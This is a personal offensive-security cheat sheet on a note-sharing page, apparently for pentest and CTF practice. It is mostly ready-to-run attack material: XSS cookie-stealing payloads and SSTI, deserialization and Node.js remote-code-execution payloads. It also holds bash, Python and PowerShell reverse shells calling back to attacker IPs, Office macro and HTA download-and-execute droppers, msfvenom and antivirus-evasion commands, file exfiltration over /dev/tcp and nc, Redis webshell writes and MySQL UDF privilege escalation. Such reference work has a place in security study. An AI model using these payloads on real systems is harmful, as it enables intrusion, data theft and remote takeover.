StevenMeow
    • Create new note
    • Create a note from template
      • Sharing URL Link copied
      • /edit
      • View mode
        • Edit mode
        • View mode
        • Book mode
        • Slide mode
        Edit mode View mode Book mode Slide mode
      • Customize slides
      • Note Permission
      • Read
        • Only me
        • Signed-in users
        • Everyone
        Only me Signed-in users Everyone
      • Write
        • Only me
        • Signed-in users
        • Everyone
        Only me Signed-in users Everyone
      • Engagement control Commenting, Suggest edit, Emoji Reply
    • Invite by email
      Invitee

      This note has no invitees

    • Publish Note

      Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note

      Your note will be visible on your profile and discoverable by anyone.
      Your note is now live.
      This note is visible on your profile and discoverable online.
      Everyone on the web can find and read all notes of this public team.
      See published notes
      Unpublish note
      Please check the box to agree to the Community Guidelines.
      View profile
    • Commenting
      Permission
      Disabled Forbidden Owners Signed-in users Everyone
    • Enable
    • Permission
      • Forbidden
      • Owners
      • Signed-in users
      • Everyone
    • Suggest edit
      Permission
      Disabled Forbidden Owners Signed-in users Everyone
    • Enable
    • Permission
      • Forbidden
      • Owners
      • Signed-in users
    • Emoji Reply
    • Enable
    • Versions and GitHub Sync
    • Note settings
    • Note Insights New
    • Engagement control
    • Make a copy
    • Transfer ownership
    • Delete this note
    • Save as template
    • Insert from template
    • Import from
      • Dropbox
      • Google Drive
      • Gist
      • Clipboard
    • Export to
      • Dropbox
      • Google Drive
      • Gist
    • Download
      • Markdown
      • HTML
      • Raw HTML
Menu Note settings Note Insights Versions and GitHub Sync Sharing URL Create Help
Create Create new note Create a note from template
Menu
Options
Engagement control Make a copy Transfer ownership Delete this note
Import from
Dropbox Google Drive Gist Clipboard
Export to
Dropbox Google Drive Gist
Download
Markdown HTML Raw HTML
Back
Sharing URL Link copied
/edit
View mode
  • Edit mode
  • View mode
  • Book mode
  • Slide mode
Edit mode View mode Book mode Slide mode
Customize slides
Note Permission
Read
Only me
  • Only me
  • Signed-in users
  • Everyone
Only me Signed-in users Everyone
Write
Only me
  • Only me
  • Signed-in users
  • Everyone
Only me Signed-in users Everyone
Engagement control Commenting, Suggest edit, Emoji Reply
  • Invite by email
    Invitee

    This note has no invitees

    • Publish Note

    Share your work with the world Congratulations! 🎉 Your note is out in the world Publish Note

    Your note will be visible on your profile and discoverable by anyone.
    Your note is now live.
    This note is visible on your profile and discoverable online.
    Everyone on the web can find and read all notes of this public team.
    See published notes
    Unpublish note
    Please check the box to agree to the Community Guidelines.
    View profile
    Engagement control
    Commenting
    Permission
    Disabled Forbidden Owners Signed-in users Everyone
    Enable
    Permission
    • Forbidden
    • Owners
    • Signed-in users
    • Everyone
    Suggest edit
    Permission
    Disabled Forbidden Owners Signed-in users Everyone
    Enable
    Permission
    • Forbidden
    • Owners
    • Signed-in users
    Emoji Reply
    Enable
    Import from Dropbox Google Drive Gist Clipboard
       Owned this note    Owned this note      
    Published Linked with GitHub
    • Any changes
      Be notified of any changes
    • Mention me
      Be notified of mention me
    • Unsubscribe
    # My Security Resources - 來幫我按星星啦 Q__Q - https://github.com/stevenyu113228/My-Security-Resources --- [TOC] ## Scan ### Portscan - nmap - Static Binary - https://github.com/ernw/static-toolbox/releases - https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/nmap.exe - Parameters - `-A` : Enable OS detection, version detection, script scanning, and traceroute - `-p-` : Scan all ports - `-p 1000-9999` : Scan port from 1000 to 9999 - `-sV` : Services version - `-Pn` : No ping - `--script=vuln` : Scan vulnerability - `-p139,445` : Only scan 139,445 port - `-sn` : Host ping scan - `--source-port 4444` : use source port 4444 to scan - Fast UDP Scan - `sudo nmap -sUV -T4 -F --version-intensity 0 {IP}` - RustScan - `rustscan -a 10.10.166.15` - `-r 1-65535` : Port range from 1 to 65535 ## Web ### Scan - [Dirsearch](https://github.com/maurosoria/dirsearch) - [Githack-python3](https://github.com/tigert1998/GitHack-py3) - [FFUF](https://github.com/ffuf/ffuf) - Fuzz sub-domain - `ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-20000.txt -u http://{domain.name}/ -H "Host: FUZZ.{domain.name}" -fs {normal_size}` - Wordlist - https://github.com/danTaler/WordLists/blob/master/Subdomain.txt - `/usr/share/dnsrecon/subdomains-top1mil.txt` - Get Parameter - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/burp-parameter-names.txt ### Front-End #### XSS - Cheatsheet - https://portswigger.net/web-security/cross-site-scripting/cheat-sheet - Steal Cookie - `<script>new Image().src="http://{my_ip}:1234/"+document.cookie</script>` - `nc -l 1234` - JQuery ``` $(`h2:contains("<img src=1 onerror=alert(1)>"`) $(`h2:contains(""<img src=1 onerror=alert(1)>`) ``` - Angular JS - `{{constructor.constructor('alert(1)')()}}` - JS feature - `"<><meow>".replace("<",1).replace(">",2)` = `12<meow>` - Replace only apply first match #### CSRF - POST ```html <form id="myForm" name="myForm" action="/change_pass.php" method="POST"> <input type=hidden name="password" id="password" value="meowmeow"/> <input type=hidden name="confirm_password" id="confirm_password" value="meowmeow"/> <input type=hidden name="submit" id="submit" value="submit"/> <script>document.createElement('form').submit.call(document.getElementById('myForm'))</script> ``` - Get CSRF Token Before POST ```javascript function post_data(csrf_token){ var xhr = new XMLHttpRequest(); xhr.open("POST", '/my-account/change-email', true); xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send("email=meow%40meow.meow&csrf="+csrf_token); } function get_csrf() { var re = /[A-Za-z0-9]{32}/g; csrf_token = this.responseText.match(re)[0]; post_data(csrf_token); } var get_csrf_request = new XMLHttpRequest(); get_csrf_request.addEventListener("load", get_csrf); get_csrf_request.open("GET", "https://xxx/my-account"); get_csrf_request.send(); ``` ### Server #### Apache - Default log path - `/var/log/apache2/access.log` - Shell Shock - Exist some path like `/cgi-bin/*.sh` - `dirsearch.py -u http://{IP}/cgi-bin -e cgi` - Add `() { :;}; echo; /usr/bin/id` to User-Agent - Must use Absolute path - `User-Agent: (){ :; }; /bin/ping -c 1 {MY_IP}` - `USer-Agent: () { :; }; /usr/bin/nslookup $(whoami).meow.org` - DNS Only - nmap test - `nmap {IP} -p {PORT} --script=http-shellshock --script-args uri=/cgi-bin/{FILE_NAME}.cgi` - Default config path - `/etc/httpd/conf/httpd.conf` - `/etc/apache2/sites-available/000-default.conf` - `/etc/apache2/apache2.conf` #### Nginx - [Alias traversal ](https://github.com/yandex/gixy/blob/master/docs/en/plugins/aliastraversal.md) - `/meow../html/index.php` #### IIS - Default web root path - `C:\inetpub\wwwroot` - IIS 6.0 - [CVE-2017-7269](https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269) - Can only run once!! #### Tomcat - Tomcat Path - `/manager/status/all` - `/admin/dashboard` - Path Bypass - With `/..;/` - e.g. `/manager/status/..;/html/upload` ### PHP - Bypass `system` - `echo passthru("whoami")` - `echo shell_exec("whoami")` - `echo exec("whoami")` - Check disable function - `phpinfo();` - `<?php var_dump(ini_get('disable_functions'));` - Bypass Disable Function - https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/shell.php - Wrapper - `php://filter/convert.base64-encode/resource=meow.php` - Default Session Path - `/var/lib/php/sessions/sess_{sess_name}` - LFI PHP_SESSION_UPLOAD_PROGRESS (From Splitline) ```python import grequests sess_name = 'meowmeow' sess_path = f'/var/lib/php/sessions/sess_{sess_name}' # sess_path = f'/var/lib/php/session/sess_{sess_name}' # sess_path = f'/tmp/sess_{sess_name}' base_url = 'http://{target-domain}/{target-path/randylogs.php}' param = "file" # code = "file_put_contents('/tmp/shell.php','<?php system($_GET[a])');" code = '''system("bash -c 'bash -i >& /dev/tcp/{domain}/{port} 0>&1'");''' while True: req = [grequests.post(base_url, files={'f': "A"*0xffff}, data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:<?php {code} ?>"}, cookies={'PHPSESSID': sess_name}), grequests.get(f"{base_url}?{param}={sess_path}")] result = grequests.map(req) if "pwned" in result[1].text: print(result[1].text) break ``` - [File extension](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst) - Bypass Extension ``` AddType application/x-httpd-php .meow ``` - Weak type - `87 == echo intval("87' meow 123 ");` - `'87ab' == 87` - not work in php8 ### XXE ```javascript= var xml = '' + '<?xml version="1.0" encoding="UTF-8"?>\n' + '<!DOCTYPE a [ <!ENTITY b SYSTEM "file:///etc/passwd"> ]>\n' + '<root>' + '<name>' + "0" + '</name>' + '<search>' + "&b;" + '</search>' + '</root>'; ``` ### JSP / Tomcat - Webshell - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmd.jsp - `jar -cvf cmd.war cmd.jsp` and upload to Tomcat admin - Brute force - hydra : `hydra -L /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -P /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt -f {IP} -s {PORT} http-get /manager/html` - msf : `scanner/http/tomcat_mgr_login` ### Django - `manage.py` - `{appname}` - `settings.py` - INSTALLED_APPS - DATABASES - `urls.py` - urlpatterns - `views` - `{URL Urlpattern's class}` ### Werkzeug - Debug Page RCE - https://github.com/its-arun/Werkzeug-Debug-RCE ### Defence - Knockd - `/etc/knockd.conf` - `nc` port several time to knock ### Web Shell - PHP - [b374k](https://github.com/b374k/b374k) - [windows-php-reverse-shell](https://github.com/Dhayalanb/windows-php-reverse-shell) - ASPX - https://raw.githubusercontent.com/SecWiki/WebShell-2/master/Aspx/awen%20asp.net%20webshell.aspx - https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/asp/cmd.aspx - Adminer (SQLadmin) - https://www.adminer.org/ ### SSTI #### ERB (Ruby) - Test - `<%= 7 * 7 %>` - RCE - `<%= system("whoami") %>` #### Tornado (Python) - Test - `{{7*7}}` - RCE - `{% import os %}{{os.popen("whoami").read()}}` #### Freemarker (Java) - Test - `${7*7}` - RCE - `${"freemarker.template.utility.Execute"?new()("whoami")}` - Read file from sandbox - `${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")}` - Use Cyberchef "From Decimal" to decode #### Handlebars (NodeJS) - RCE ``` {{#with "s" as |string|}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return require('child_process').exec('id');"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} {{/with}} {{/with}} {{/with}} {{/with}} ``` #### Pug (NodeJS) Bypass keyword blacklist ``` #{function(){eval(`localLoad=global.process.mainModule.constructor._load;sh=localLoad('child`+`_process').exec('ncat 10.10.10.10 7777 -e /bin/bash')`)}()} ``` #### Jinja2 (Python) - For flask, Django ...... - Secret key - `{{settings.SECRET_KEY}}` ### Unserialize #### Python ```python= import subprocess import pickle class Meow(object): def __reduce__(self): return subprocess.check_output, (['ping', '-c', '1', '10.10.10.10'], ) a = Meow() # print(base64.b64encode(pickle.dumps(a))) class Meow(object): def __reduce__(self): return os.system, ("bash -c 'bash -i >& /dev/tcp/192.168.119.130/7877 0>&1'",) payload = pickle.dumps(Meow()) payload = base64.b64encode(payload).decode() ``` ### ASP.Net #### Json.Net ``` .\ysoserial.exe -g ObjectDataProvider -f Json.Net -c 'ping {My_IP}' ``` - [Json.Net Unserialize (Hack The Box Writeup)](https://blog.stevenyu.tw/2022/10/11/json-net-unserialize-hack-the-box-writeup/) - Limitation : In `JsonConvert.DeserializeObject`, the `TypeNameHandling` in configuration `JsonSerializerSettings` must not be `None`, can be `Objects`, `Arrays`, `All`, `Auto` #### XML Serializer - `xmlSerializer.Deserialize(xmlReader);` ### Java - String start with - `\xac\xed\x00\x05` or Base64 (`rO0AB`) - ysoserial - https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar ```dockerfile FROM openjdk:11.0.16 COPY ysoserial-all.jar /root/ysoserial-all.jar ENTRYPOINT ["java", "-jar", "/root/ysoserial-all.jar"] # docker build . -t ysoserial:meow ``` - PoC - `docker run --rm ysoserial:meow CommonsCollections3 'touch /tmp/meow'` - Reverse shell - `docker run --rm ysoserial:meow CommonsCollections3 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zNS43NC42Ny4xOS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}'` - Note that don't add `-it` in docker ### Nodejs - RCE - eval - `require("child_process").exec("echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExOS4xMzAvNzc3NyAwPiYxJwo= | base64 -d | bash");` - function - `global.process.mainModule.constructor._load("child_process").exec("bash -c 'bash -i >& /dev/tcp/111.111.111.111/443 0>&1' ")` - Universal - `process.binding("spawn_sync").spawn({ file: '/bin/sh', args: ["sh", "-c", "ls -al"], stdio: [ { type: "pipe", writable: true, readable: true }, { type: "pipe", writable: true, readable: true } ] }).output+''` ### CMS #### Wordpress - WPScan - `wpscan --url {URL} --enumerate p,t,u --plugins-detection aggressive -t 30` - enumerate - p : plugin - t : theme - u : users - t : thread - `wpscan --url {url} --usernames {username} --passwords {password_file} -t 30` - Enum user - `http://{ip}/index.php/?author=1` - plugins path - `/wp-content/plugins/{plugin_name}` - Password db - `SELECT concat(user_login,":",user_pass) FROM wp_users;` - Config file (DB Pass) - `wp-config.php` - Plugin Webshell - `wget https://raw.githubusercontent.com/jckhmr/simpletools/master/wonderfulwebshell/wonderfulwebshell.php` - `zip wonderfulwebshell.zip wonderfulwebshell.php` - Upload and Enable - `http://{doamin}/wp-content/plugins/wonderfulwebshell/wonderfulwebshell.php?cmd=ls` ### MySQL injection - https://portswigger.net/web-security/sql-injection/cheat-sheet #### SQL Command - Limit - `LIMIT 0,1` , `LIMIT 1,1` , `LIMIT 2,1` ... - Select only 1 data - `LIMIT 1 OFFSET 0`, `LIMIT 1 OFFSET 1` - Substring - `SUBSTRING("ABC",1,1)` - Will return `A` - `SUBSTRING("ABC",2,1)` - Will return `B` - ASCII - `ASCII("A")` - Will Return `65` - Concat - `concat(1,':',2)` - Will return `1:2` - Group concat - `group_concat()` - Concatenate multiple data to one line string - String Length - `length()` - Row counts - `count()` - Current db - `database()` - Distinct item - `distinct()` - Quote - `SELECT 'meow''meow';` = `meow'meow` #### Dump Data - DB name - `select schema_name from information_schema.schemata` - Table name - `select table_name from information_schema.tables where table_schema='{db_name}'` - Column name - `select column_name from information_schema.columns where table_name='{table_name}' and table_schema='{db_name}'` - Select data - `select concat({username},':',{password}) from {db_name}.{table_name}` - Mysql User and hash - `select concat(user,':',password) from mysql.user` - Command dump - `mysqldump -u {username} -h localhost -p {dbname} > a.sql` - `--all-databases` #### File - Write file - `SELECT "meow" INTO OUTFILE "/tmp/a";` ### PostgreSQL injection - Current - db - `current_database()` - schema - `current_schema` (without `()`) - DB names - `SELECT datname FROM pg_database` - Schema names - `SELECT schemaname FROM pg_tables` - Table names - `SELECT tablename FROM pg_tables WHERE schemaname='{schemaname}'` - Column name - `SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' and table_schema='{schema name}'` - Select Data - `SELECT {column} FROM {SCHEMA}.{TABLE}` - Conditional time delays - `SELECT CASE WHEN ({condition}) THEN pg_sleep(10) ELSE pg_sleep(0) END` - Order By - `... ORDER BY (CASE WHEN 1=0 THEN id ELSE length(name) END)` - `SELECT $$meow$$` = `SELECT 'meow'` - Write file - `COPY (SELECT $$<?php system($_GET[1]) ?>$$) TO $$/tmp/meow$$` - `COPY (SELECT CONVERT_FROM(decode($$PD9waHAgc3lzdGVtKCRfR0VUWzFdKSA/Pg==$$,$$base64$$),$$utf-8$$)) TO $$/tmp/meow$$` ### MSSQL injection #### SQL Command - `SELECT quotename({col_name}) FROM {DB} FOR XML PATH('')` - Like `group_concate` in MySQL - `SELECT TOP 1 {COL_NAME} FROM {TABLE}` - `SELECT TOP 1 {COL_NAME} FROM {TABLE} WHERE {COL_NAME} NOT IN ('A','B')` - `SELECT {COL_NAME} FROM {DB_NAME}.dbo.{TABLE}` - Select other DB - `CONVERT(int,{command})` - Error based - Concatenation String - `'aaa'+'bbb'` - String length - `LEN()` - Current DB - `db_name()` #### Dump DB Name - `DB_NAME({NUM})` - NUM start from 1 - `SELECT name FROM master ..sysdatabases` - `SELECT name FROM master.dbo.sysdatabases` - One line - `SELECT quotename(name) FROM master.dbo.sysdatabases FOR XML PATH('')` #### Dump Table name - One line - `SELECT quotename(name) FROM {DB_NAME}..sysobjects where xtype='U' FOR XML PATH('')` - Select One Data - `SELECT TOP 1 name,NULL FROM music..sysobjects where xtype='U'` - `and name not in ('Table_1','Table_2')` #### Dump column name - One line - `SELECT quotename(name) FROM {DB_NAME}..syscolumns WHERE id=(SELECT id FROM {DB_NAME}..sysobjects WHERE name='{TABLE_NAME}') FOR XML PATH('')))) -- -` - Select One Data - `SELECT column_name FROM information_schema.columns WHERE table_catalog='{DB NAME}' AND table_name='{TABLE_NAME}'` #### DB Admin - `select concat(user,',',password),NULL from master.dbo.syslogins -- -` ### Oracle Injection - Concatenation String - `'aaa'||'bbb'` - Sub string - `SUBSTR('ABC',1,1)` - Return `A` - `SUBSTR('ABC',2,1)` - Return `B` - Union based - Column counts, Data type must be same (`NULL`) - Select must have `FROM`, if no item can FROM, use `dual` - eg. `' UNION SELECT NULL,NULL,3 FROM dual --` - Current Username - `SELECT USER FROM dual` - Dump DB (Schema) Names - `SELECT DISTINCT OWNER FROM ALL_TABLES` (return multiple rows) - Common (Normal DB) : `APEX_040200`, `MDSYS`, `SEQUELIZE`, `OUTLN`, `CTXSYS`, `OLAPSYS`, `FLOWS_FILES`, `SYSTEM`, `DVSYS`, `AUDSYS`, `DBSNMP`, `GSMADMIN_INTERNAL`, `OJVMSYS`, `ORDSYS`, `APPQOSSYS`, `XDB`, `ORDDATA`, `SYS`, `WMSYS`, `LBACSYS` - But data may in `SYSTEM` or other existing DB - Dump Table Names - All : `SELECT OWNER,TABLE_NAME FROM ALL_TABLES` - Specific DB: `SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='{DB_NAME}'` - Dump Column Names - `SELECT COLUMN_NAME FROM ALL_TAB_COLUMNS WHERE TABLE_NAME='{TABLE_NAME}'` - Select data - `SELECT {Col1},{Col2} FROM {Table}` - Select One line using ROWNUM (Doesn't support limit) - eg. `SELECT NULL,COLUMN_NAME,3 FROM (SELECT ROWNUM no, TABLE_NAME, COLUMN_NAME FROM ALL_TAB_COLUMNS WHERE TABLE_NAME='WEB_ADMINS') where no=1 -- ` - no=1 2 3 ... - DB Version - `select version from V$INSTANCE` - `select BANNER from v$version` - Error Based - ` SELECT CASE WHEN ({condition}) THEN NULL ELSE to_char(1/0) END FROM dual ` - Current DB - `SELECT SYS.DATABASE_NAME FROM dual` ### SQLite Injection - Version - `sqlite_version()` - Table - `select name from sqlite_master WHERE type='table'` - Column - `select sql from sqlite_master WHERE type='table'` - Data - `select {Column} from {Table}` ### MongoDB Injection - Basic Usage - `show dbs` - `use {mango}` - `show collections` - `db.users.find()` - `db.users.find({username:'admin'})` - `db.users.find({'username':{'$eq' : 'admin'}})` - ne (not equal) - `db.users.find({username:{$ne : 1}})` - regex - `db.users.find({username:{$regex : '.+'}})` - `db.users.find({username:{$regex : '^Meow'}})` - HTTP - `?username[$ne]=1` - ref - https://book.hacktricks.xyz/pentesting-web/nosql-injection - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection ### SSRF - Localhost - `localhost` - `127.0.0.1`, `127.0.0.255`, `127.255.254.255` ### Linux - Current process - `/proc/self/cmdline` ### Web Socket ```python # pip install websocket-client from websocket import create_connection ws = create_connection("ws://xxx.xxx.xxx.xxx/xxxx") print(ws.recv()) ws.send("meow") ``` ### Remote Debugger #### Python - Remote - `pip install ptvsd` - Add following code in source code ```python= import ptvsd ptvsd.enable_attach(redirect_output=True) ptvsd.wait_for_attach() ``` - Rsync code to local - `rsync -avh -e 'ssh -i xxx.pem' ubuntu@10.10.10.10:django` - VSCode Auto generate Remote Attach - Modify `connect`, `pathMappings` #### Java Jar JDB - Remote - `java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=0.0.0.0:9999 -jar file.jar` - Local - `rlwrap jdb -attach {IP}:{Port}` - Command - Breakpoint - `stop in {com.example.servingwebcontent.classname}.{function name}` - `stop in {com.example.servingwebcontent.classname}:{Line Number}` (JD-gui) - Show variable - `locals` - Set variable - `set var=value` - Step - `step` next line (into function) - `stepi` next line - `cont` continue #### Node.js - Rsync copy code - `node --inspect=0.0.0.0:9229 target.js` - VSCode auto generate launch.json #### .Net dnSpy - Backup DLL first - Right click DLL - Edit Assembly Attribute - edit`[assembly: Debuggable .....]`) into ``` [assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default | DebuggableAttribute.DebuggingModes.DisableOptimizations | DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints | DebuggableAttribute.DebuggingModes.EnableEditAndContinue)] ``` - Compile, File-> Save Module - Debug -> Attach to Process - `w3wp.exe` - Debug -> Windows -> Modules - Find the DLL ## Client Side Attack ### Office Macro - File type : `docm` or `doc`, doesn't support `docx` - Open cmd when start ```vba Sub AutoOpen() MyMacro End Sub Sub Document_Open() MyMacro End Sub Sub MyMacro() Dim str As String str = "cmd /c whoami && pause" CreateObject("Wscript.Shell").Run str End Sub ``` - cmd path will at `system32` - shell : `str = powershell iex (New-Object Net.WebClient).DownloadString('http://{IP}/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress {IP} -Port {PORT}` - Reverse shell 1 - `msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT=443 -e x86/shikata_ga_nai -f vba > shell.vba` - First Half to macro - Second Half to word doc - Reverse shell 2 (macro_pack) - `msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.247 LPORT=443 -e x86/shikata_ga_nai -f vba > shell.vba` - [macro_pack](https://github.com/sevagas/macro_pack) - `macro_pack.exe -f shell.vba -o -G meow.doc` ### HTA (HTML Application) - VBS RCE - ` <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.119.132/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.119.132 -Port 53"</scRipt>` ## Shell ### Linux Shell - Find File - `find / -iname {file_name} -print 2>/dev/null` - `du -a 2>/dev/null | grep {file_name}` - `tar cf - $PWD 2>/dev/null | tar tvf - | grep {file_name}` ### Windows Shell - List all data - `dir /a` - `gci -recurse | select fullname` (Powershell) - Short name - `dir /x` - Find File - `dir {file_name} /s /p` ### Reverse Shell - Linux - Prepare - `nc -nvlp {port}` - `nc -vlk {port}` - `rlwrap nc -nvlp` - Support left and right - https://reverse-shell.sh/ - [Reverse Shell Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) - Bash tcp - `bash -c 'bash -i >& /dev/tcp/my_ip/7877 0>&1'` - Write file in local first, and use wget/curl to get to victim machine - `/usr/bin/wget -O - {ip:port}/{file} | /bin/bash` - `bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}%2F{PORT}%200%3E%261%27` - Nc - `nc {IP} {Port} -e /bin/bash` - Python - `python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{IP}",{PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' &` - Make it more interactively - `python -c 'import pty; pty.spawn("/bin/bash")'` - `perl -e 'exec "/bin/bash";'` - Full shell (Can use vim) - `bash` (Zsh doesn't support) - `nc -nlvp 443` (Open Port to listening, and wait shell to conect) - `python -c 'import pty; pty.spawn("/bin/bash")'` (Spawn shell) - Ctrl + Z - `stty raw -echo` - `fg` (Will not show) - `reset` - Enter , Enter - Ctrl + C - `export SHELL=bash` - `export TERM=xterm-256color` - `stty rows 38 columns 116` - js Shell Code - ` msfvenom -p linux/x86/shell_reverse_tcp LHOST={IP} LPORT={Port} CMD=/bin/bash -f js_le -e generic/none` - [socat](https://github.com/ernw/static-toolbox/releases/download/socat-v1.7.4.1/socat-1.7.4.1-x86) - Server : ```socat file:`tty`,raw,echo=0 tcp-listen:{PORT}``` - Client : `./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{IP}:{PORT}` - Reverse SSH - https://github.com/Fahrj/reverse-ssh ### Reverse Shell - Windows - msfvenom - https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ - stage : `shell/reverse_tcp` - msf `multi/handler` to receive - stageless : `shell_reverse_tcp` - `nc` to receive - aspx - `msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f aspx > shell.aspx` - `msfvenom -p windows/shell/reverse_tcp LHOST={IP} LPORT={PORT} -f aspx > shell.aspx` - exe - `msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f exe > shell-x86.exe` - `msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={PORT} -e x86/shikata_ga_nai -f exe > shell.exe` - Anti-Anti-virus - `msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={PORT} -f exe -o shellx64.exe` - Most of time, x64 system can also run x86 shell - msi - `msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP} LPORT={Port} -f msi -o shellx64.msi` - Install by `msiexec /quiet /i shellx64.msi` - Powershell - [Invoke-PowerShellTcp](https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1) - `powershell iex (New-Object Net.WebClient).DownloadString('http://{my_ip}:{http_port}/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress {my_ip} -Port {shell_port}` - Add `Invoke-PowerShellTcp -Reverse -IPAddress {IP} -Port {Port}` in the last line, and `powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.35/Invoke-PowerShellTcp1.ps1')` - [mini-reverse.ps1](https://gist.github.com/Serizao/6a63f35715a8219be6b97da3e51567e7/raw/f4283f758fb720c2fe263b8f7696b896c9984fcf/mini-reverse.ps1) - `powershell IEX (New-Object Net.WebClient).DownloadString('http://10.1.1.246/mini-reverse.ps1')` ### File Transmission - Linux - SCP - HTTP - Prepare - `python3 -m http.server` - use `sudo` to `get` 80 port - GET - `wget {my_ip}:{port}/{file_name} -O {path_to_output}` - `curl -o {path_to_output} http` - NC - Prepare - `nc -l -p {attacker_port} > {file}` - Send - `nc {attacker_ip} {attacker_port} < {file}` - `cat {file} > /dev/tcp/{ip}/{port}` - TCP - `nc -nlvp {Port} < {file}` - `cat<'/dev/tcp/{IP}/{Port}' > {file}` - FTP - `python3 -m pyftpdlib -p 21 -w` ### File Transmission - Windows - HTTP - Prepare - `python3 -m http.server` - GET (Powershell) - `wget` , `curl` , `iwr` is alias for `Invoke-WebRequest` - `Invoke-WebRequest http://{my_ip}:{my_port}/{file} -outFile {file_name}` - `-UseBasicParsing` - `certutil -urlcache -f {URL} {File_name}` - `cer"t"u"""""t"il -u"rl"c"ac"""""he -f {url} {file}` (Bypass Defender in 2022/10/26) - SMB - `impacket-smbserver meow .` - In Kali - `-smb2support` - `copy \\{IP}\meow\{filename} {filename}` - In Windows - `net view {IP}` - Show shares - Pack file - cab - `lcab -r {dir} {file.cab}` - In kali - `expand {file.cab} -F:* {Extract path}` - Extract path must be absolute path like `C:\Windows\Temp` - https://blog.ropnop.com/transferring-files-from-kali-to-windows/ ## Server ### Redis - Write shell / file - `redis-cli -h {ip} ` - Connect - `config set dir "/var/www/html"` - Set dir - `config set dbfilename meow.php` - Set file name - `set x "\r\n\r\n<?php system($_GET[A]);?>\r\n\r\n"` - Write web shell - `save` - Save file ### MySQL #### Exploit - User-Defined Function (UDF) Dynamic Library (Linux) - `SHOW VARIABLES LIKE 'plugin_dir';` - Check plugin dir - Write File Method (1) - `use mysql;` - `create table hack(line blob);` - `insert into hack values(load_file('/tmp/lib_sys_udf.so'));` - File From https://github.com/zinzloun/MySQL-UDF-PrivEsc (https://www.exploit-db.com/exploits/1518) - `select * from hack into dumpfile '/{plugin_dir}/lib_sys_udf.so';` - Write File Method (2) - `xxd -p -c 9999999 lib_sys_udf.so` - `SET @SHELL=0x{.....}` - `SHOW VARIABLES LIKE 'plugin_dir';` - `SELECT BINARY @SHELL INTO DUMPFILE '{PLUGIN_DIR}/meow.so';` - `create function do_system returns integer soname 'lib_sys_udf.so';` - `select do_system("{Bash script}");` - Not show return - User-Defined Function (UDF) Dynamic Library(Windows) - `SHOW VARIABLES LIKE 'plugin_dir';` - Default XAMPP : `C:/xampp/mysql/lib/plugin` - But dir not exist, need to create by yourself - Use [mysql-udf-build.sh](https://gist.githubusercontent.com/kazkansouh/3476a8c8846472da06f980494ac2c457/raw/559eb0dc4f4d0d5d1fbf69e2965bda292f8511ff/mysql-udf-build.sh) - `bash mysql-udf-build.sh 64 win 'C:/xampp/mysql/lib/plugin'` - Remember to install `x86_64-w64-mingw32-gcc` - Don't add tail `/` - Read `lib_mysqludf_sys_win_64.sql` and run - `SET @lib = 0x....` - `SELECT BINARY @lib INTO DUMPFILE 'C:/..../mysql/lib/plugin/lib_mysqludf_sys_win_64.dll';` - `DROP FUNCTION IF EXISTS sys_exec;` - `CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys_win_64.dll';` - Execute Command - `SELECT sys_exec("ping 35.74.67.19"); ` #### Logging - Conf File - `/etc/my.cnf.d/mysql-server.cnf` (Centos) - 